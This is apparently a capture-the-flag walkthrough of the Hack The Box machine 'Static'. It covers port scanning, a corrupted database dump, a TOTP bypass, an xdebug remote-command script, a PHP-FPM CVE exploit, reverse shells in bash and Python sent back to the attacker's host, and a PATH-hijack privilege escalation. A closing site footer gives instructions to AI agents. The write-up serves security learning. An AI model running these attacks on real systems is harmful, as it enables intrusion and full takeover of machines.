# Static
## Enumeration
As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports.
The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:
> nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.246 -oN allPorts
* `-sS` use the **TCP SYN** scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.
* `--min-rate 5000` nmap will try to keep the sending rate **at or above** 5000 packets per second.
* `-p-` scanning the entire port range, **from 1 to 65535**.
* `-T5` **insane** mode, it is the fastest mode of the nmap time template.
* `-Pn` assume the host is **online**.
* `-n` scan without reverse **DNS** resolution.
* `-oN` **save** the scan result into a file, in this case the *allports* file.
{% code overflow="wrap" %}
```bash
# Nmap 7.92 scan initiated Mon Sep 19 23:24:24 2022 as: nmap -sS --min-rate 5000 -n -Pn -p- -oN secondScan 10.10.10.246
Nmap scan report for 10.10.10.246
Host is up (0.047s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
2222/tcp open EtherNetIP-1
8080/tcp open http-proxy
# Nmap done at Mon Sep 19 23:25:04 2022 -- 1 IP address (1 host up) scanned in 39.76 seconds
```
{% endcode %}
Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:
> nmap -sC -sV -p22,2222,8080 10.10.10.246 -oN targeted
* `-sC` performs the scan using the default set of **scripts**.
* `-sV` enables **version** detection.
* `-oN` **save** the scan result into file, in this case the *targeted* file.
{% code overflow="wrap" %}
```bash
# Nmap 7.92 scan initiated Mon Sep 19 23:25:26 2022 as: nmap -sCV -p22,2222,8080 -oN secondTargeted 10.10.10.246
Nmap scan report for 10.10.10.246
Host is up (0.036s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 16:bb:a0:a1:20:b7:82:4d:d2:9f:35:52:f4:2e:6c:90 (RSA)
| 256 ca:ad:63:8f:30:ee:66:b1:37:9d:c5:eb:4d:44:d9:2b (ECDSA)
|_ 256 2d:43:bc:4e:b3:33:c9:82:4e:de:b6:5e:10:ca:a7:c5 (ED25519)
2222/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a9:a4:5c:e3:a9:05:54:b1:1c:ae:1b:b7:61:ac:76:d6 (RSA)
| 256 c9:58:53:93:b3:90:9e:a0:08:aa:48:be:5e:c4:0a:94 (ECDSA)
|_ 256 c7:07:2b:07:43:4f:ab:c8:da:57:7f:ea:b5:50:21:bd (ED25519)
8080/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| http-robots.txt: 2 disallowed entries
|_/vpn/ /.ftp_uploads/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Sep 19 23:25:55 2022 -- 1 IP address (1 host up) scanned in 29.35 seconds
```
{% endcode %}
The SSH services on ports *22*, and *2222*, look like are hosted in different systems. Could be different containers. Website on port 8080 shows an empty page. But nmap detected a `robots.txt` file with two entries.
The `/.ftp_uploads/` directory has two files.
The `warning.txt` file says that some files might be corrupted.
The `db.sql.gz` file looks like a *GZIP* compressed file.
> file db.sql.gz
{% code overflow="wrap" %}
```
db.sql.gz: gzip compressed data, was "db.sql", last modified: Thu Jun 18 15:43:42 2020, from Unix, original size modulo 2^32 355
```
{% endcode %}
But it looks like the file is corrupted.
> gzip -d db.sql.gz
* `-d` **decompress** file.
```
gzip: db.sql.gz: invalid compressed data--crc error
gzip: db.sql.gz: invalid compressed data--length erro
```
## Exploitation
There is a tool called *fixgz*, which you can download from [here](https://github.com/yonjar/fixgz), which allow us to fix a corrupted `.gz` file.
> git clone
>
> cd fixgz/
>
> gcc fixgz.cpp -o fixgz
Let's fix the corrupted file.
> fixgz db.sql.gz db.sql.gz.fixed
Now, we could read its content with *zcat*.
> zcat db.sql.gz.fixed
{% code overflow="wrap" %}
```sql
CREATE DATABASE static;
USE static;
CREATE TABLE users ( id smallint unsigned not null auto_increment, username varchar(20) not null, password varchar(40) not null, totp varchar(16) not null, primary key (id) );
INSERT INTO users ( id, username, password, totp ) VALUES ( null, 'admin', 'd033e22ae348aeb5660fc2140aec35850c4da997', 'orxxi4c7orxwwzlo' );
```
{% endcode %}
We get the password hash of the `admin` user. The password for that SHA1 hash is `admin`, as we can see in *crackstation*. Note that we also see a *TOTP* key, which might be valuable later.
On the other hand, the `/vpn/` directory shows a login page, and the credentials that we found seem to be valid.
But, it asks for an *OTP* number, because *2FA* is enabled.
I wrote the following script, which will give the correct *OTP* number, synchronizing the time, and using the *TOTP* key.
```python
#!/usr/bin/python3
import pyotp
import ntplib
from time import ctime
client = ntplib.NTPClient()
response = client.request("10.10.10.246")
totp = pyotp.TOTP("orxxi4c7orxwwzlo")
print(totp.at(response.tx_time))
```
Now, we are able to log in.
> python getToken.py
```
022725
```
The website shows a list of servers with their IP addresses and their status.
If we enter something on the `Common Name` field, and press on `Generate`, we'll download a `.ovpn` file.
The VPN file won't work because it is trying to connect to `vpn.static.htb`.
> openvpn test.ovpn
```
...
2022-09-20 18:34:40 RESOLVE: Cannot resolve host address: vpn.static.htb:1194 (Name or service not known)
...
```
Let's add the domain name to the `/etc/hosts` file.
> nano /etc/hosts
```
# Host addresses
127.0.0.1 localhost
127.0.1.1 alfa8sa
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
f02::2 ip6-allrouters
10.10.10.246 vpn.static.htb
```
Now, we can connect to the VPN.
> openvpn test.ovpn
```
...
2022-09-20 18:37:37 Initialization Sequence Completed
```
Note that we have a new IP address on the interface `tun9`.
> ip a
```
...
10: tun9: mtu 1500 qdisc fq_codel state UNKNOWN group default qlen 500
link/none
inet 172.30.0.9/16 scope global tun9
valid_lft forever preferred_lft forever
inet6 fe80::4d88:26ab:dbee:9517/64 scope link stable-privacy
valid_lft forever preferred_lft forever
```
Let's use the *bnmap* tool, which you can download from [here](https://github.com/alfa8sa/bnmap), to check for open ports on the hosts that we saw on the website. First, put the IP addresses of the other servers in the `hosts` file.
> nano hosts
```
172.17.0.10
172.20.0.10
172.20.0.11
172.30.0.1
192.168.254.3
```
Now, scan those IP addresses through the `tun9` interface.
> bnmap.sh -f hosts -i tun9
* `-f` scan networks and/or hosts in **file**.
* `-i` scan **interface**.
```
_
| |__ _ __ _ __ ___ __ _ _ __
| '_ \| '_ \| '_ \ _ \ / _\ | '_ \
| |_) | | | | | | | | | (_| | |_) |
|_.__/|_| |_|_| |_| |_|\__,_| .__/
|_|
-------------@alfa8sa--------------
-----------------------------------
[*] Scanning open ports for 172.17.0.10
[#########################] 100% (10000 / 10000 ports)
-----------------------------------
[*] Scanning open ports for 172.20.0.10
[!] Port open: 172.20.0.10:22
[!] Port open: 172.20.0.10:80
[#########################] 100% (10000 / 10000 ports)
-----------------------------------
[*] Scanning open ports for 172.20.0.11
[!] Port open: 172.20.0.11:3306
[#########################] 100% (10000 / 10000 ports)
-----------------------------------
[*] Scanning open ports for 172.30.0.1
[!] Port open: 172.30.0.1:22
[!] Port open: 172.30.0.1:2222
[#########################] 100% (10000 / 10000 ports)
-----------------------------------
[*] Scanning open ports for 192.168.254.3
[#########################] 100% (10000 / 10000 ports)
```
As we can see, we don't have connection with the `pub` and `pki` server, the `db` server has an *SQL* service exposed, the `web` server has both *SSH* and *HTTP* exposed, and the `vpn` server has the same services as the main machine. Let's take a look at the website in the `web` server. First, to reach the container, add an *ip route*.
> ip route add 172.20.0.10 dev tun9
The `vpn/` directory shows the same login page saw earlier. And the `info.php` file shows the default *PHP* info page.
At some point, you'll see that the `xdebug` functionality is enabled.
There is a way to get *Remote Command Execution* in the machine using `xdebug`.
```python
#!/usr/bin/env python2
import socket, signal, sys, re
from base64 import b64decode
def def_handler(sig, frame):
print("\n\n[!] Quiting...\n")
sys.exit(1)
#Ctrl+C
signal.signal(signal.SIGINT, def_handler)
ip_port = ('0.0.0.0', 9000)
sk = socket.socket()
sk.bind(ip_port)
sk.listen(10)
conn, addr = sk.accept()
while True:
client_data = conn.recv(1024)
response_b64 = re.findall(r'CDATA\[(.*?)\]', client_data)[0]
try:
output = b64decode(response_b64)
print(output)
except:
None
data = raw_input ('>> ')
conn.sendall('eval -i 1 -- %s\x00' % data.encode('base64'))
```
Let's execute the script with *Python 2*.
> python2 exploit\_shell.py
To trigger the exploit we'll have to make a GET request.
> curl 172.20.0.10/info.php?XDEBUG\_SESSION\_START=alfa8sa
Now, we are able to execute commands on the system.
```
>> system("whoami")
www-data
```
Let's get a reverse shell. First, set a *netcat* listener on port *4444*.
> nc -lvnp 4444
* `-l` **listen** mode.
* `-v` **verbose** mode.
* `-n` **numeric-only** IP, no DNS resolution.
* `-p` specify the **port** to listen on.
Now, send a reverse shell from the `web` server to our local machine, with the IP address of the VPN. We'll get the reverse shell as the `www-data` user, and we'll be able to grab the user flag.
> system("bash -c 'bash -i >& /dev/tcp/172.30.0.9/4444 0>&1'")
```
listening on [any] 4444 ...
connect to [172.30.0.9] from (UNKNOWN) [172.30.0.1] 44844
bash: cannot set terminal process group (37): Inappropriate ioctl for device
bash: no job control in this shell
www-data@web:/var/www/html$ whoami
whoami
www-data
www-data@web:/var/www/html$ cat /home/user.txt
cat /home/user.txt
c3f343befcac5fa92fb5373456e94247
```
## Privilege Escalation
To get a more comfortable shell, let's create a new pair of SSH keys on our local machine.
> ssh-keygen
```
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa):
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /root/.ssh/id_rsa
Your public key has been saved in /root/.ssh/id_rsa.pub
The key fingerprint is:
SHA256:BB525izsjrcx4YURZ4Alw/RcnBBo+qu/GliJ9DGavw4 root@alfa8sa
The key's randomart image is:
+---[RSA 3072]----+
| o++X=*. |
| =O %o |
| . = B + |
|..=.o. = |
|.ooo + S |
| o. .+ o |
|.E....* |
| ..o. + |
| +*o.. |
+----[SHA256]-----+
```
Copy the public key.
> cat id\_rsa.pub | xclip -sel clip
And put it in the `authorized_keys` of the `www-data` user.
> echo "ssh-rsa AAAA...Nx/7E= root\@alfa8sa" >> /home/www-data/.ssh/authorized\_keys
Now, we are able to log into the machine through SSH without having to give any password.
> ssh www-data\@10.10.10.246 -p 2222
```
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.19.0-17-amd64 x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
This system has been minimized by removing packages and content that are
not required on a system that users do not log into.
To restore this content, you can run the 'unminimize' command.
Last login: Mon Jun 14 08:00:30 2021 from 10.10.14.4
www-data@web:~$ whoami
www-data
```
If we check the network interfaces, we'll see that the `web` server has two interfaces, apart from the local one.
> ifconfig
```
eth0: flags=4163 mtu 1500
inet 172.20.0.10 netmask 255.255.255.0 broadcast 172.20.0.255
ether 02:42:ac:14:00:0a txqueuelen 0 (Ethernet)
RX packets 10361 bytes 782008 (782.0 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 10371 bytes 744940 (744.9 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
eth1: flags=4163 mtu 1500
inet 192.168.254.2 netmask 255.255.255.0 broadcast 192.168.254.255
ether 02:42:c0:a8:fe:02 txqueuelen 0 (Ethernet)
RX packets 28 bytes 10641 (10.6 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 9 bytes 628 (628.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73 mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
loop txqueuelen 1000 (Local Loopback)
RX packets 20 bytes 1055 (1.0 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 20 bytes 1055 (1.0 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
```
And from this container we have connection with the `pki` server.
> ping -c 1 192.168.254.3
* `-c` number of ICMP **packets**.
```
PING 192.168.254.3 (192.168.254.3) 56(84) bytes of data.
64 bytes from 192.168.254.3: icmp_seq=1 ttl=64 time=0.209 ms
--- 192.168.254.3 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.209/0.209/0.209/0.000 ms
```
Let's transfer with *scp* the `bnmap.sh` script to the `web` server, to be able to scan the `pki` server.
> scp -P 2222 bnmap.sh www-data\@10.10.10.246:/tmp/bnmap.sh
Now, give the script the right permissions, and scan the `pki` server.
> chmod +x bnmap.sh
>
> ./bnmap.sh -p 192.168.254.3
```
_
| |__ _ __ _ __ ___ __ _ _ __
| '_ \| '_ \| '_ \ _ \ / _\ | '_ \
| |_) | | | | | | | | | (_| | |_) |
|_.__/|_| |_|_| |_| |_|\__,_| .__/
|_|
-------------@alfa8sa--------------
[*] Scanning open ports for 192.168.254.3
[!] Port open: 192.168.254.3:80
[#########################] 100% (10000 / 10000 ports)
```
Only port 80 is open. Let's exit the current SSH shell, and log in again, but doing port forwarding of port 80 of the `pki` server.
> ssh www-data\@10.10.10.246 -p 2222 -L 80:192.168.254.3:80
Now, we can access the HTTP server of the `pki` server by accessing port 80 on our local machine.
There is not much going on the website. But if we check the HTTP headers, we'll see that the website is running `PHP-FPM/7.1`.
> curl -I
```
HTTP/1.1 200 OK
Server: nginx/1.14.0 (Ubuntu)
Date: Tue, 20 Sep 2022 17:32:41 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP-FPM/7.1
```
There is a python script, which you can download from [here](https://github.com/theMiddleBlue/CVE-2019-11043/blob/master/exploit.py), which exploits `PHP-FPM`, and allow us to execute commands on the system.
> python exploit.py --url --verbose
```
...
[*] RCE successfully exploited!
You should be able to run commands using:
curl http://127.0.0.1/index.php?a=bin/ls+/
```
Now, we are able to run commands on the system.
> curl -s -G -X GET "" --data-urlencode "a=/usr/bin/whoami" | awk "/' -/,/: cannot open/" | sed "s/' -//g" | grep -v cannot
```
www-data
```
Time to get a shell. As we can only catch the reverse shell from the web server, we'll have to transfer the `nc` binary, which you can download from [here](https://github.com/andrew-d/static-binaries/blob/master/binaries/linux/x86_64/ncat), to the web server.
> scp -P 2222 ncat www-data\@10.10.10.246:/tmp/ncat
Now, set a *netcat* listener on port *4444*.
> /tmp/ncat -lvnp 4444
I will run a one-liner reverse shell in python. Then, we'll catch a reverse shell from the `pki` server.
> curl -s -G -X GET "" --data-urlencode "a=/usr/bin/python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF\_INET,socket.SOCK\_STREAM);s.connect(("192.168.254.2",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(\["/bin/sh","-i"]);'
```
Ncat: Version 6.49BETA1 ( http://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 192.168.254.3.
Ncat: Connection from 192.168.254.3:54528.
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ hostname -I
192.168.254.3
$ hostname
pki
```
Let's set an interactive *TTY* shell.
> script /dev/null -c /bin/bash
Then I press `Ctrl+Z` and execute the following command on my local machine:
> stty raw -echo; fg
>
> reset
>
> Terminal type? xterm
Next, I export a few variables:
> export TERM=xterm
>
> export SHELL=bash
Finally, I run the following command in our local machine:
> stty size
```
51 236
```
And set the proper dimensions in the victim machine:
> stty rows 51 columns 236
At this point, I started enumerating the machine looking for ways of becoming the `root` user, but I couldn't find anything until I listed the capabilities.
{% hint style="info" %}
Linux divides the privileges traditionally associated with superuser into distinct units, known as **capabilities**, which can be independently enabled and disabled.
{% endhint %}
> getcap / -r 2>/dev/null
* `-r` enables **recursive** search.
```
/usr/bin/ersatool = cap_setuid+eip
```
There is one binary with the `cap_setuid` capability. Let's transfer `pspy` to the `pki` server, and execute the binary to see what it is doing. First, transfer it to the `web` server.
> scp -P 2222 pspy64 www-data\@10.10.10.246:/tmp/pspy
Now, log in again into the `web` server, and set a simple *HTTP* server on port *1234* with python in the `/tmp` directory.
> ssh www-data\@10.10.10.246 -p 2222
>
> cd /tmp
>
> python3 -m http.server 1234
As the `pki` machine doesn't have tools such as *wget* or *curl* to download *pspy* from the `web` server, we'll have to make our own `curl` function. Copy the following function, and paste it in the terminal.
```bash
function __curl() {
read proto server path <<<$(echo ${1//// })
DOC=/${path// //}
HOST=${server//:*}
PORT=${server//*:}
[[ x"${HOST}" == x"${PORT}" ]] && PORT=80
exec 3<>/dev/tcp/${HOST}/$PORT
echo -en "GET ${DOC} HTTP/1.0\r\nHost: ${HOST}\r\n\r\n" >&3
(while read line; do
[[ "$line" == $'\r' ]] && break
done && cat) <&3
exec 3>&-
}
```
Now, download *pspy* from the web server using the custom `curl` function.
> \_\_curl > pspy
>
> chmod +x pspy
Now, if we run *pspy*, and then on another shell we run the `ersatool` binary.
> ersatool
```
help
create|print|revoke|exit
# create
create->CN=testing
client
dev tun9
proto udp
remote vpn.static.htb 1194
...
```
The tool looks like it's creating the *VPN* file we used at the begging of the machine. But, we can see with *pspy*, that the binary runs with the `UID=0`, which means that runs as root, and it is using relative paths with some commands.
```
2022/09/20 18:05:16 CMD: UID=0 PID=2045 | openssl version
```
We could exploit a path hijacking vulnerability to set the *SUID* permission to the `/bin/bash` binary. First, make a file called `openssl` in the `/tmp` directory with the following content, and give it execution permissions.
> echo "chmod u+s /bin/bash" > /tmp/openssl
>
> chmod +x /tmp/openssl
Now, modify the `$PATH` variable, so that the `/tmp` directory is the first one.
> export PATH=/tmp:$PATH
Now, run the `ersatool` binary, and enter some random *CN*.
> ersatool
```
# test
create|print|revoke|exit
# create
create->CN=testing
...
```
Now, as the `/tmp` directory is the first one in the `$PATH` variable, the binary has executed the `openssl` script we made as root.
```
2022/09/20 18:14:28 CMD: UID=0 PID=2077 | chmod u+s /bin/bash
```
Finally, if we execute *bash* as *root*, all we have to do is reap the harvest and take the root flag.
> bash -p
```
bash-4.4# whoami
root
bash-4.4# cat /root/root.txt
b3298f99ac5999202090829ed5fa9fb6
```
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://alfa8sa.gitbook.io/htb-writeups/linux-machines/static.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.